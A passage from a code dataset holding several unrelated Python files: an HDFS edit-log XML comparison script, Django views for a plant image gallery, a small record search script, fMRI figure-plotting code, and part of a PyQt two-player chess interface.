list:\r\n if ((l[0]==\"BLOCK_ID\") or (l[0]==\"INODEID\")):\r\n ret.append(l)\r\n for l in list:\r\n if (l[0] == \"PATH\"):\r\n ret.append(l)\r\n return ret\r\n\r\ndef get_BLOCK_INODE(list,op):\r\n ret=[]\r\n txid=operate_TXID(list,op)\r\n for t in txid:\r\n ret.append(list_ALL_MK(t,list[t-1],op))\r\n return ret\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n file1_list=[]\r\n file2_list=[]\r\n file3_list=[]\r\n file1_list = getXmlData(\"NN41.xml\")\r\n file2_list = getXmlData(\"NN42.xml\")\r\n file3_list = getXmlData(\"NN44.xml\")\r\n\r\n\r\n list1=get_BLOCK_INODE(file1_list,\"OP_ADD\")\r\n list2=get_BLOCK_INODE(file2_list,\"OP_ADD\")\r\n list3=get_BLOCK_INODE(file3_list,\"OP_ADD\")\r\n print(list1)\r\n print(\"\\n\")\r\n print(list2)\r\n print(\"\\n\")\r\n print(list3)\r\n\r\n # res=com_ALL_MK(list1,list2,list3)\r\n # print(res)\r\n # print(a)\r\n # print(\"\\n\")\r\n # print(b)\r\n #\r\n # block_1=get_BLOCK(t1, file1_list,\"OP_ALLOCATE_BLOCK_ID\")\r\n # block_2 = get_BLOCK(t2, file2_list, \"OP_ALLOCATE_BLOCK_ID\")\r\n # block_3 = get_BLOCK(t3, file3_list, \"OP_ALLOCATE_BLOCK_ID\")\r\n # print(block_1)\r\n # print(block_2)\r\n # print(block_3)\r\n # result=compare_files_by_allocate_mkdir(\"allocate\",\"blockid\",block_1, block_2,block_3)\r\n # print(result)\r\n #\r\n # # print(result)\r\n\r\n","repo_name":"weijinjinnihao/Xml_Diff","sub_path":"XML_Diff_weijin/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36145447304","text":"from django.urls import reverse_lazy, reverse\r\nfrom django.views import generic\r\nfrom .forms import PlantForm\r\nfrom .models import Plant, Category\r\nfrom django import forms\r\n\r\n\r\nclass PlantSearchForm(forms.Form):\r\n category = forms.fields.ChoiceField(\r\n label = 'カテゴリー',\r\n choices = (),\r\n required = False,\r\n widget = forms.widgets.Select\r\n )\r\n\r\n per_page = forms.fields.ChoiceField(\r\n label = '表示件数',\r\n choices = (\r\n # (None, \"-\"),\r\n (1, \"1\"),\r\n (2, \"2\"),\r\n (10, \"10\"),\r\n (50, \"50\",),\r\n ),\r\n required = False,\r\n widget = forms.widgets.Select\r\n )\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(PlantSearchForm, self).__init__(*args, **kwargs)\r\n # カテゴリーの選択肢を設定モデルから取得する\r\n self.fields['category'].choices = Category.objects.all().values_list('slug', 'name')\r\n # 0番目の未設定の選択肢を挿入\r\n self.fields['category'].choices.insert(0, ('', '未設定'))\r\n \r\n for field in self.fields.values():\r\n field.widget.attrs[\"class\"] = \"form-control\"\r\n\r\n\r\nclass plant_imagelist(generic.ListView):\r\n \"\"\"画像の一覧\"\"\"\r\n model = Plant\r\n context_object_name = 'plantImages'\r\n #オブジェクトのサブセットを表示する\r\n queryset = Plant.objects.order_by('-uetuke_date').prefetch_related(\r\n 'categories',\r\n )\r\n #ページネーション\r\n paginate_by = 2\r\n page_kwarg = 'page'\r\n paginate_root_url = reverse_lazy('plants:plant_imagelist')\r\n\r\n def get_context_data(self, **kwargs):\r\n context = super().get_context_data(**kwargs)\r\n #ログインしていたらplantに編集用のURLを付与する\r\n if self.request.user.is_authenticated:\r\n plantimages = context['plantImages']\r\n for plantimage in plantimages:\r\n plantimage.edit_url = reverse(f'admin:{plantimage._meta.app_label}_{plantimage._meta.model_name}_change', args=[plantimage.pk])\r\n context['plantImages'] = plantimages\r\n \r\n #検索条件やper_pageを含んだページネーション用URL\r\n self.paginate_root_url += '?'\r\n query_dict = self.request.GET.copy()\r\n if self.page_kwarg in query_dict.keys():\r\n query_dict.pop(self.page_kwarg)\r\n for key, value in query_dict.items():\r\n self.paginate_root_url += f'&{key}={value}'\r\n context['paginate_root_url'] = self.paginate_root_url\r\n\r\n # 検索フォーム\r\n context['search_form'] = PlantSearchForm(self.request.GET)\r\n return context\r\n\r\n def get_queryset(self, **kwargs):\r\n # 動的なフィルタリング\r\n queryset = super().get_queryset(**kwargs)\r\n if self.request.GET.get('category'):\r\n queryset = queryset.filter(\r\n categories__slug = self.request.GET.get('category')\r\n ) \r\n return queryset\r\n\r\n def get_paginate_by(self, queryset):\r\n # per_pageをクエリによって動的に変える\r\n paginate_by = super().get_paginate_by(queryset)\r\n if self.request.GET.get('per_page'):\r\n paginate_by = int(self.request.GET.get('per_page'))\r\n return paginate_by \r\n\r\n\r\nclass image_add(generic.CreateView):\r\n \"\"\"画像の追加\"\"\"\r\n model = Plant\r\n form_class = PlantForm\r\n success_url = reverse_lazy('plants:plant_imagelist')\r\n\r\n\r\nclass image_update(generic.UpdateView):\r\n \"\"\"画像の更新\"\"\"\r\n model = Plant\r\n form_class = PlantForm\r\n template_name_suffix = '_update_form'\r\n success_url = reverse_lazy('plants:plant_imagelist')\r\n \r\n \r\nclass image_delete(generic.DeleteView):\r\n template_name = 'plants/plant_confirm_delete.html'\r\n model = Plant\r\n success_url = reverse_lazy('plants:plant_imagelist')\r\n\r\n\r\nclass index(generic.TemplateView):\r\n template_name = 'plants/index.html'\r\n ","repo_name":"rookie-shinichi-returns/norikofarm","sub_path":"plants/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32864475903","text":"from collections import defaultdict\nimport re\n\ndef searchData(**txt):\n\n## Add\n empl = defaultdict(list)\n with open(\"input.data\") as data:\n for line in data.readlines():\n output = line.split(\":\")\n if re.match(r'idx', line):\n ocol=re.sub(r'\\n','', output[1].strip())\n colnames=ocol.split(\",\")\n continue\n outputidx = output[0].strip()\n output1 = output[1].strip()\n output2 =output1.split(\",\")\n #print(colnames[0]+\":\"+ output2[0])\n if outputidx in empl[outputidx]:\n empl[outputidx].append({colnames[0].strip():output2[0].strip(),colnames[1].strip():output2[1].strip(),colnames[2].strip():output2[2].strip(),colnames[3].strip():output2[3].strip(),colnames[4].strip():output2[4].strip()})\n else:\n empl[outputidx]={colnames[0].strip(): output2[0].strip(), colnames[1].strip(): output2[1].strip(), colnames[2].strip(): output2[2].strip(), colnames[3].strip(): output2[3].strip(),colnames[4].strip(): output2[4].strip()}\n #print(empl)\n\n## Search\n count=0\n for i in range(1,len(empl)+1):\n #print(empl[str(i)])\n for skey, svalue in txt.items():\n if skey in empl[str(i)] and svalue==empl[str(i)][skey]:\n count+=1\n if (count > 0):\n print(\"Value is present\")\n else:\n print(\"value is not present\")\n##Delete\n for i in range(1,len(empl)+1):\n #print(empl[str(i)])\n for skey, svalue in txt.items():\n if skey in empl[str(i)] and svalue==empl[str(i)][skey]:\n count+=1\n del empl[str(i)]\n if (count > 0):\n print(\"Value is present and deleted\")\n print(empl)\n else:\n print(\"value is not present\")\n\n\nsearchData(fname=\"John\")\n","repo_name":"rajeshkr2016/training","sub_path":"int/ReaddataSF.py","file_name":"ReaddataSF.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5953368893","text":"\"\"\"Plots figures for the Glass coherence block design fMRI experiment\n\"\"\"\n\nimport os, os.path\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport numpy as np\n\nimport fmri_tools.utils\n\nimport glass_coherence_block.analysis.paths\n\n\ndef write_mask_cmap( rois, cmap_path ):\n\t\"\"\"Writes a SUMA colourmap for the mask display\"\"\"\n\n\timport brewer2mpl\n\n\tmap_name = \"Dark2\"\n\tmap_type = \"qualitative\"\n\n\tn_cols = len( rois )\n\n\tcols = brewer2mpl.get_map( map_name, map_type, n_cols ).mpl_colors\n\n\ti_rois = [ int( roi[ 1 ] ) for roi in rois ]\n\n\tcmap = np.zeros( ( max( i_rois ), 3 ) )\n\n\tfor ( i, i_roi ) in enumerate( i_rois ):\n\n\t\tcmap[ i_roi - 1, : ] = cols[ i ]\n\n\tnp.savetxt( cmap_path, cmap )\n\n\ndef write_mask_plot_dataset( conf, paths, dset_path, hemi ):\n\t\"\"\"Writes the dataset necessary for an 'activation' analysis in SUMA\n\n\t`conf` and `paths` are for the desired subject\n\n\t\"\"\"\n\n\t( dset_dir, _ ) = os.path.split( dset_path )\n\n\tstart_dir = os.getcwd()\n\tos.chdir( dset_dir )\n\n\tmask_path = paths.ana.mask.full( \"_{h:s}-full.niml.dset\".format( h = hemi ) )\n\trois_path = paths.roi.rois.full( \"_{h:s}-full.niml.dset\".format( h = hemi ) )\n\n\t# first, want to change each mask node to its corresponding ROI value\n\tcmd = [ \"3dcalc\",\n\t \"-a\", mask_path,\n\t \"-b\", rois_path,\n\t \"-expr\", \"'a*b'\",\n\t \"-prefix\", dset_path,\n\t \"-overwrite\"\n\t ]\n\n\tfmri_tools.utils.run_cmd( \" \".join( cmd ) )\n\n\t# but, that didn't take into account nodes that aren't part of any ROI.\n\tcmd = [ \"3dcalc\",\n\t \"-a\", mask_path,\n\t \"-b\", dset_path,\n\t \"-expr\", \"'b+(ispositive(a)*iszero(b)*70)'\",\n\t \"-prefix\", dset_path,\n\t \"-overwrite\"\n\t ]\n\n\tfmri_tools.utils.run_cmd( \" \".join( cmd ) )\n\n\tos.chdir( start_dir )\n\n\ndef plot_task_perf( conf, paths, show_plot = False ):\n\t\"\"\"Plot the task performance\"\"\"\n\n\tcond_labels = [ \"0\", \"33\", \"66\", \"100\" ]\n\n\tn_cond = len( cond_labels )\n\n\tn_bins = conf[ \"ana\" ][ \"task_perf_n_bins\" ]\n\n\ttime_bins = np.arange( start = 0,\n\t stop = conf[ \"ana\" ][ \"task_bin_res_s\" ] * n_bins,\n\t step = conf[ \"ana\" ][ \"task_bin_res_s\" ]\n\t )\n\n\tbin_offsets = np.array( [ -0.06, -0.02, 0.02, 0.06 ] ) / 2.5\n\n\tsubj_ids = conf[ \"all_subj\" ].keys()\n\n\tn_subj = len( subj_ids )\n\n\tdata = np.empty( ( n_subj, n_bins, n_cond ) )\n\tdata.fill( np.NAN )\n\n\tfor ( i_subj, subj_id ) in enumerate( subj_ids ):\n\n\t\tsubj_conf = glass_coherence_block.config.get_conf( subj_id )\n\t\tsubj_paths = glass_coherence_block.analysis.paths.get_subj_paths( subj_conf )\n\n\t\tdata[ i_subj, ... ] = np.loadtxt( subj_paths.task.perf.full( \".txt\" ) )\n\n\t# average over subjects; mean is 20 x 5\n\tmean = np.mean( data, axis = 0 )\n\n\t# standard error\n\tstd_error = np.std( data, axis = 0 ) / np.sqrt( n_subj )\n\n\t_set_defaults()\n\n\tfig = plt.figure()\n\n\tfig.set_size_inches( 3.34646, 3.34646 * 0.75, forward = False )\n\n\tax = fig.gca()\n\tax.hold( True )\n\n\tfor i_cond in xrange( n_cond ):\n\n\t\tx = time_bins + bin_offsets[ i_cond ]\n\n\t\t_ = [ ax.plot( [ x[ i ] ] * 2, [ mean[ i, i_cond ] - std_error[ i, i_cond ],\n\t\t mean[ i, i_cond ] + std_error[ i, i_cond ]\n\t\t ],\n\t\t c = [ 0.5 ] * 3\n\t\t )\n\t\t for i in xrange( mean.shape[ 0 ] )\n\t\t ]\n\n\t\tax.scatter( x,\n\t\t mean[ :, i_cond ],\n\t\t marker = \"s\",\n\t\t edgecolor = [ 0 ] * 3,\n\t\t facecolor = [ 0 ] * 4,\n\t\t s = 5,\n\t\t zorder = 100\n\t\t )\n\n\t_cleanup_fig( ax )\n\n\tax.set_xlim( ( -0.05, time_bins[ -1 ] + 0.05 ) )\n\n\tax.set_xlabel( \"Time from target onset (s)\" )\n\tax.set_ylabel( \"Correlation (r)\" )\n\n\tfig.tight_layout( pad = 0.5 )\n\n\tif show_plot:\n\t\tfig.show()\n\telse:\n\t\tfig_path = paths.fig_task.full( \".svg\" )\n\t\tplt.savefig( fig_path )\n\n\n\ndef _set_defaults():\n\t\"\"\"Set some sane defaults for figures.\n\t\"\"\"\n\n\tparams = { 'axes.labelsize': 9 * ( 1 / 1.25 ),\n\t 'axes.titlesize' : 10,\n\t 'font.family' : 'Arial',\n\t 'font.sans-serif' : 'Helvetica',\n\t 'text.fontsize': 12,\n\t 'legend.fontsize': 7,\n\t 'xtick.labelsize': 8 * ( 1 / 1.25 ),\n\t 'xtick.direction' : 'out',\n\t 'xtick.major.size' : 2,\n\t 'ytick.labelsize': 8 * ( 1 / 1.25 ),\n\t 'ytick.direction' : 'out',\n\t 'ytick.major.size' : 2\n\t }\n\t\n\tplt.rcParams.update( params )\n\n\tplt.ioff()\n\n\ndef _cleanup_fig( ax ):\n\t\"\"\"Apply some standard commands to clean up the axes on figures.\n\t\"\"\"\n\n\tfor loc, spine in ax.spines.iteritems():\n\n\t\tspine.set_linewidth( 0.5 )\n\n\t\tif loc in [ \"left\", \"bottom\" ]:\n\t\t\tspine.set_position( ( \"outward\", 5 ) )\n\t\telif loc in [ \"right\", \"top\" ]:\n\t\t\tspine.set_color( \"none\" )\n\t\telse:\n\t\t\traise ValueError( \"Unknown spine location: %s\" % loc )\n\n\tax.xaxis.set_ticks_position( \"bottom\" )\n\tax.yaxis.set_ticks_position( \"left\" )\n\n\ndef plot_psc( conf, paths, show_plot = False ):\n\t\"\"\"Plot the PSC for each ROI\"\"\"\n\n\t_set_defaults()\n\n\tfig = plt.figure()\n\n\tfig.set_size_inches( 7.08661, 4.5, forward = True )\n\n\tgs = gridspec.GridSpec( 2, 3 )\n\n\tx = np.array( conf[ \"stim\" ][ \"coh_levels\" ] ) * 100\n\n\tsubj_col = [ 0.8 ] * 3\n\n\tfor ( i_roi, ( roi_name, _ ) ) in enumerate( conf[ \"ana\" ][ \"rois\" ] ):\n\n\t\tax = plt.subplot( gs[ i_roi ] )\n\n\t\tax.hold( True )\n\n\t\tsubj_data_path = paths.psc.full( \"_{roi:s}-norm.txt\".format( roi = roi_name ) )\n\n\t\t# this is subjects x coherences\n\t\tsubj_data = np.loadtxt( subj_data_path )\n\n\t\tfor i_subj in xrange( subj_data.shape[ 0 ] ):\n\n\t\t\tax.plot( x,\n\t\t\t subj_data[ i_subj, : ],\n\t\t\t color = subj_col\n\t\t\t )\n\n\t\t\tax.scatter( x,\n\t\t\t subj_data[ i_subj, : ],\n\t\t\t edgecolor = [ 1 ] * 3,\n\t\t\t facecolor = subj_col,\n\t\t\t )\n\n\t\tdata_path = paths.descrip.full( \"_{roi:s}.txt\".format( roi = roi_name ) )\n\n\t\t# ( mean, sem )\n\t\t( data_mean, data_sem ) = np.loadtxt( data_path )\n\n\t\tax.plot( x,\n\t\t data_mean,\n\t\t \"k\",\n\t\t linewidth = 1.5\n\t\t )\n\n\t\t_ = [ ax.plot( [ xx ] * 2,\n\t\t [ xx_data_mean - xx_data_sem, xx_data_mean + xx_data_sem ],\n\t\t \"k\",\n\t\t linewidth = 1.5\n\t\t )\n\t\t for ( xx, xx_data_mean, xx_data_sem ) in zip( x, data_mean, data_sem )\n\t\t ]\n\n\t\tax.scatter( x,\n\t\t data_mean,\n\t\t edgecolor = [ 1 ] * 3,\n\t\t facecolor = \"k\",\n\t\t zorder = 100,\n\t\t marker = \"s\",\n\t\t s = 35\n\t\t )\n\n\t\t_cleanup_fig( ax )\n\n\t\tax.set_xlim( [ -10, 110 ] )\n\t\tax.set_ylim( [ -0.325, 0.325 ] )\n\n\t\tif i_roi == 3:\n\t\t\tax.set_ylabel( \"Response (norm psc)\" )\n\t\t\tax.set_xlabel( \"Stimulus coherence (%)\" )\n\n\t\tax.set_xticks( x )\n\t\tax.set_yticks( [ -0.2, 0, 0.2 ] )\n\n\t\tax.text( 0.1,\n\t\t 0.9,\n\t\t conf[ \"ana\" ][ \"roi_labels\" ][ i_roi ],\n\t\t transform = ax.transAxes,\n\t\t fontsize = 10 / 1.25\n\t\t )\n\n\tplt.subplots_adjust( left = 0.09,\n\t bottom = 0.12,\n\t right = 0.97,\n\t top = 0.97,\n\t wspace = 0.41,\n\t hspace = 0.34\n\t )\n\n\tif show_plot:\n\t\tplt.show()\n\telse:\n\t\tsave_path = paths.fig_psc.full( \".svg\" )\n\t\tplt.savefig( save_path )\n","repo_name":"djmannion/glass_coherence_block","sub_path":"analysis/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72896015450","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ntwoplayers.py\n2-player game mode\n\"\"\"\n\nimport json\nimport board\nimport chess\nimport asyncio\n\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\n\ndef getMinutesSeconds(seconds):\n\tif seconds < 60:\n\t\treturn 0, seconds\n\treturn seconds // 60, seconds - (seconds // 60 * 60)\n\n\nclass MoveButton(QPushButton):\n\tdef __init__(self, parent, text=\"\"):\n\t\tsuper(MoveButton, self).__init__(parent=parent)\n\t\tself.setCursor(Qt.CursorShape.PointingHandCursor)\n\t\tself.setFont(QFont(QFontDatabase.applicationFontFamilies(QFontDatabase.addApplicationFont(QDir.currentPath() + \"/fonts/ChakraPetch-Regular.ttf\"))[0], 15, weight=40))\n\t\tself.setText(text)\n\t\tself.setFixedSize(100, 30)\n\t\tself.setFocusPolicy(Qt.ClickFocus)\n\n\tdef enterEvent(self, event: QHoverEvent) -> None:\n\t\tself.setStyleSheet(\"background-color: rgba(100, 0, 255, 0.75); color: white;\")\n\t\tsuper(MoveButton, self).enterEvent(event)\n\n\tdef leaveEvent(self, event: QHoverEvent) -> None:\n\t\tself.setStyleSheet(\"background-color: transparent; color: black;\")\n\t\tsuper(MoveButton, self).leaveEvent(event)\n\n\nclass TemporaryMoveButton(MoveButton):\n\tdef __init__(self, parent, text=\"\"):\n\t\tsuper(TemporaryMoveButton, self).__init__(parent, text=text)\n\t\tself.setStyleSheet(\"background-color: rgba(0, 0, 0, 0.05); color: black;\")\n\t\tself.setFocusPolicy(Qt.ClickFocus)\n\n\tdef enterEvent(self, event: QHoverEvent) -> None:\n\t\tsuper(TemporaryMoveButton, self).enterEvent(event)\n\t\tself.setStyleSheet(\"background-color: rgba(0, 0, 0, 0.1); color: black;\")\n\n\tdef leaveEvent(self, event: QHoverEvent) -> None:\n\t\tsuper(TemporaryMoveButton, self).leaveEvent(event)\n\t\tself.setStyleSheet(\"background-color: rgba(0, 0, 0, 0.05); color: black;\")\n\n\nclass BackButton(QPushButton):\n\tdef __init__(self, parent):\n\t\tsuper(BackButton, self).__init__(parent=parent)\n\t\tself.setText(\"←\")\n\t\tself.setCursor(Qt.CursorShape.PointingHandCursor)\n\t\tself.pressed.connect(self.parent().back)\n\t\tself.status_tip = QLabel(\"Back\", parent)\n\t\tself.status_tip.setAlignment(Qt.AlignmentFlag.AlignCenter)\n\t\tself.status_tip.hide()\n\t\tself.setStyleSheet(\"color: black; background-color: white; border: none;\")\n\n\tdef focusInEvent(self, event) -> None:\n\t\tif event.reason() <= 2:\n\t\t\tself.status_tip.show()\n\t\t\tself.setStyleSheet(\"color: black; background-color: limegreen; border: none;\")\n\t\tsuper(BackButton, self).focusInEvent(event)\n\n\tdef focusOutEvent(self, event) -> None:\n\t\tif event.reason() <= 2:\n\t\t\tself.status_tip.hide()\n\t\t\tself.setStyleSheet(\"color: black; background-color: white; border: none;\")\n\t\tsuper(BackButton, self).focusOutEvent(event)\n\n\tdef resizeEvent(self, event) -> None:\n\t\tself.status_tip.setFixedWidth(event.size().width())\n\t\tself.status_tip.move(QPoint(self.pos().x(), self.pos().y() + event.size().width()))\n\t\tsuper(BackButton, self).resizeEvent(event)\n\n\tdef enterEvent(self, event: QEvent) -> None:\n\t\tself.status_tip.show()\n\t\tself.setStyleSheet(\"color: black; background-color: limegreen; border: none;\")\n\t\tsuper(BackButton, self).enterEvent(event)\n\n\tdef leaveEvent(self, event: QEvent) -> None:\n\t\tself.status_tip.hide()\n\t\tself.setStyleSheet(\"color: black; background-color: white; border: none;\")\n\t\tsuper(BackButton, self).leaveEvent(event)\n\n\nclass Clock(QPushButton):\n\tdef __init__(self, parent, time_control, timeup_function=None):\n\t\tsuper(Clock, self).__init__(parent=parent)\n\t\tself.timeup_function = timeup_function\n\t\tself.time_control = time_control\n\t\tif time_control.endswith(\"+0s\"):\n\t\t\tself.clock_minutes = int(time_control[:time_control.index(\".\")])\n\t\t\tself.clock_seconds = round(6 * float(time_control[time_control.index(\".\") + 1:time_control.index(\"+\") - 1]))\n\t\telif \"+\" in time_control:\n\t\t\tself.clock_minutes = int(float(time_control[:time_control.index(\"+\") - 1]))\n\t\t\tself.clock_seconds = round(6 * float(time_control[time_control.index(\".\") + 1:time_control.index(\"+\") - 1]))\n\t\telse:\n\t\t\tself.clock_minutes = getMinutesSeconds(int(time_control[:-1]))[0]\n\t\t\tself.clock_seconds = getMinutesSeconds(int(time_control[:-1]))[1]\n\t\tself.updateText()\n\t\tself.running = False\n\t\tself.timer = QTimer()\n\t\tself.timer.timeout.connect(self.updateClock)\n\t\tself.setStyleSheet(\"background-color: #EEE; border: none;\")\n\t\tself.setFont(QFont(\"Arial\", 30))\n\t\tself.setFocusPolicy(Qt.NoFocus)\n\n\tdef updateText(self):\n\t\tself.setText(str(self.clock_minutes) + \":\" + str(self.clock_seconds).rjust(2, \"0\"))\n\n\tdef start(self):\n\t\tself.timer.start(1000)\n\t\tself.running = True\n\n\tdef pause(self):\n\t\tself.timer.stop()\n\t\tself.running = False\n\n\tdef updateClock(self):\n\t\tif self.clock_seconds == 0:\n\t\t\tif self.clock_minutes == 0:\n\t\t\t\tif self.timeup_function is not None:\n\t\t\t\t\tself.timeup_function(self)\n\t\t\t\tself.pause()\n\t\t\t\treturn\n\t\t\tself.clock_seconds = 59\n\t\t\tself.clock_minutes -= 1\n\t\telse:\n\t\t\tself.clock_seconds -= 1\n\t\tself.updateText()\n\n\tdef resetClock(self):\n\t\tif \"+\" not in self.time_control:\n\t\t\tself.clock_minutes = getMinutesSeconds(int(self.time_control[:-1]) + 1)[0]\n\t\t\tself.clock_seconds = getMinutesSeconds(int(self.time_control[:-1]) + 1)[1]\n\t\t\tself.updateClock()\n\n\nclass TakebackButton(QPushButton):\n\tdef __init__(self, parent):\n\t\tsuper(TakebackButton, self).__init__(\"⇐\", parent)\n\t\tself.setStyleSheet(\"TakebackButton { background-color: transparent; border: none; } TakebackButton:hover { background-color: #AAA; border: none; }\")\n\t\tself.setCursor(Qt.PointingHandCursor)\n\t\tself.setToolTip(\"Takeback\")\n\n\tdef mouseReleaseEvent(self, event) -> None:\n\t\tif not self.parent().game.raw_move_list:\n\t\t\treturn\n\t\tself.parent().game.takeback()\n\t\tself.parent().board.updatePieces()\n\t\tasyncio.get_event_loop().run_until_complete(self.parent().updateTakebackOpening())\n\t\tif self.parent().clocks[0].running:\n\t\t\tself.parent().clocks[0].pause()\n\t\t\tself.parent().clocks[1].start()\n\t\telse:\n\t\t\tself.parent().clocks[0].start()\n\t\t\tself.parent().clocks[1].pause()\n\t\tself.parent().moves_layout.removeWidget(self.parent().move_buttons[-1])\n\t\tself.parent().move_buttons[-1].deleteLater()\n\t\tdel self.parent().move_buttons[-1]\n\t\tself.parent().moves_count -= 0.5\n\t\tsuper(TakebackButton, self).mouseReleaseEvent(event)\n\n\nclass TwoPlayers(QWidget):\n\tdef __init__(self, parent):\n\t\tsuper(TwoPlayers, self).__init__(parent=parent)\n\t\tself.type_ = \"twoplayers\"\n\t\tself.settings_values = json.load(open(\"settings.json\"))\n\t\tself.game = None\n\t\tself.time_control = None\n\t\tself.game_over = False\n\t\tself.animation = QPropertyAnimation(self, b\"pos\")\n\t\tself.animation.setEndValue(QPoint())\n\t\tself.animation.setDuration(250)\n\t\tself.moves_count = 1\n\t\tself.board = self.variant = None\n\t\tself.sidebar = QGroupBox(self)\n\t\tself.sidebar.setStyleSheet(\"border: none;\")\n\t\tself.sidebar_layout = QGridLayout()\n\t\tself.opening = QLabel(\"Starting Position\", self)\n\t\tself.opening.setWordWrap(True)\n\t\tself.opening.setFont(QFont(QFontDatabase.applicationFontFamilies(QFontDatabase.addApplicationFont(QDir.currentPath() + \"/fonts/ChakraPetch-Bold.ttf\"))[0], 17, italic=True))\n\t\tself.opening.resize(QSize(300, 50))\n\t\tself.moves = QWidget()\n\t\tself.moves_layout = QGridLayout()\n\t\tself.moves_layout.setAlignment(Qt.AlignTop | Qt.AlignLeft)\n\t\tself.moves_layout.setSpacing(0)\n\t\tself.move_buttons = []\n\t\tself.moves.setLayout(self.moves_layout)\n\t\tself.moves_wrapper = QScrollArea()\n\t\tself.moves_wrapper.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\t\tself.moves_wrapper.setWidgetResizable(True)\n\t\tself.moves_wrapper.setWidget(self.moves)\n\t\tself.takeback = TakebackButton(self)\n\t\tself.game_over_label = self.game_result_label = None\n\t\tself.sidebar_layout.addWidget(self.moves_wrapper)\n\t\tself.sidebar.setLayout(self.sidebar_layout)\n\t\tself.back_button = BackButton(self)\n\t\tself.clocks = []\n\t\tself.sidebar.move(QPoint((self.width() // 2) + 400, 100))\n\t\tself.temporary_move = None\n\t\tself.setFocusPolicy(Qt.NoFocus)\n\n\tdef setTimeControl(self, time_control):\n\t\tif time_control == \"unlimited\":\n\t\t\treturn\n\t\tself.time_control = time_control\n\t\tself.clocks.append(Clock(self, self.time_control, self.timeout))\n\t\tself.clocks[0].move(QPoint(self.width() - self.clocks[0].width(), self.height() - self.clocks[0].height()))\n\t\tself.clocks.append(Clock(self, self.time_control, self.timeout))\n\t\tself.clocks[1].move(QPoint(self.width() - self.clocks[1].width(), 20))\n\n\tdef setupBoard(self, variant, position_type, position):\n\t\tself.variant = variant\n\t\tif variant == \"Standard\":\n\t\t\tif position_type == \"FEN\":\n\t\t\t\tself.game = chess.Game(fen=position)\n\t\t\telse:\n\t\t\t\tself.game = chess.Game()\n\t\t\t\tself.game.loadPGN(position)\n\t\telif variant == \"Antichess\":\n\t\t\tif position_type == \"FEN\":\n\t\t\t\tself.game = chess.Antichess(fen=position)\n\t\t\telse:\n\t\t\t\tself.game = chess.Antichess()\n\t\t\t\tself.game.loadPGN(position)\n\t\telif variant == \"Three Check\":\n\t\t\tif position_type == \"FEN\":\n\t\t\t\tself.game = chess.ThreeCheck(fen=position)\n\t\t\telse:\n\t\t\t\tself.game = chess.ThreeCheck()\n\t\t\t\tself.game.loadPGN(position)\n\t\telse:\n\t\t\tif position_type == \"FEN\":\n\t\t\t\tself.game = chess.Atomic(fen=position)\n\t\t\telse:\n\t\t\t\tself.game = chess.Atomic()\n\t\t\t\tself.game.loadPGN(position)\n\t\tself.board = board.Board(self, self.game)\n\t\tself.sidebar.raise_()\n\n\tdef addTemporaryMove(self, text):\n\t\tself.temporary_move = TemporaryMoveButton(self, text)\n\t\tself.move_buttons.append(self.temporary_move)\n\t\tself.moves_layout.addWidget(self.move_buttons[-1], self.getGridIndex()[0], self.getGridIndex()[1])\n\t\tself.move_buttons[-1].show()\n\t\tself.moves_wrapper.verticalScrollBar().setSliderPosition(self.moves_wrapper.verticalScrollBar().maximum())\n\n\tdef startClocks(self):\n\t\tif self.clocks:\n\t\t\tself.clocks[0].start()\n\n\tdef back(self):\n\t\tif self.clocks:\n\t\t\tif self.clocks[0].running:\n\t\t\t\tself.clocks[0].pause()\n\t\t\tif self.clocks[1].running:\n\t\t\t\tself.clocks[1].pause()\n\t\tself.parent().parent().resetTwoPlayerGame()\n\t\tself.parent().setCurrentIndex(0)\n\n\tdef getGridIndex(self) -> list:\n\t\tcolumns = 0\n\t\tfor i in range(len(self.move_buttons)):\n\t\t\tif i % 2 == 0 and i != 0:\n\t\t\t\tcolumns += 1\n\t\treturn [columns, int(len(self.move_buttons) % 2 == 0)]\n\n\tdef timeout(self, clock):\n\t\tif self.clocks[0].running:\n\t\t\tself.clocks[0].pause()\n\t\telse:\n\t\t\tself.clocks[1].pause()\n\t\tself.game_over = True\n\t\tself.takeback.deleteLater()\n\t\tself.parent().parent().setWindowTitle(\"2-Player Chess Game: \" + (\"Black\", \"White\")[self.clocks.index(clock)] + \" wins\")\n\t\tself.game_over_label = QLabel(\"Game Over\", self)\n\t\tself.game_over_label.setFont(QFont(QFontDatabase.applicationFontFamilies(QFontDatabase.addApplicationFont(QDir.currentPath() + \"/fonts/ChakraPetch-Light.ttf\"))[0], 22))\n\t\tself.game_over_label.setAlignment(Qt.AlignCenter)\n\t\tself.game_over_label.setFixedWidth(self.opening.width())\n\t\tself.game_over_label.show()\n\t\tself.game_result_label = QLabel((\"Black\", \"White\")[self.clocks.index(clock)] + \" wins by clock flag\", self)\n\t\tself.game_result_label.setFixedHeight(25)\n\t\tself.game_result_label.show()\n\t\tself.game_over_label.move(QPoint(self.width() // 4 - self.opening.width(), self.height() // 2 + self.opening.height()))\n\t\tself.game_result_label.move(QPoint(self.width() // 4 - self.opening.width(), self.height() // 2 + self.opening.height() + self.game_over_label.height()))\n\t\tself.game_result_label.setFont(QFont(QFontDatabase.applicationFontFamilies(QFontDatabase.addApplicationFont(QDir.currentPath() + \"/fonts/ChakraPetch-Light.ttf\"))[0], 20))\n\t\tself.game_result_label.setAlignment(Qt.AlignCenter)\n\t\tself.game_result_label.setFixedWidth(self.opening.width())\n\n\tdef addMove(self, move) -> None:\n\t\tself.move_buttons.append(MoveButton(self.moves, move))\n\t\tself.moves_layout.addWidget(self.move_buttons[-1], self.getGridIndex()[0], 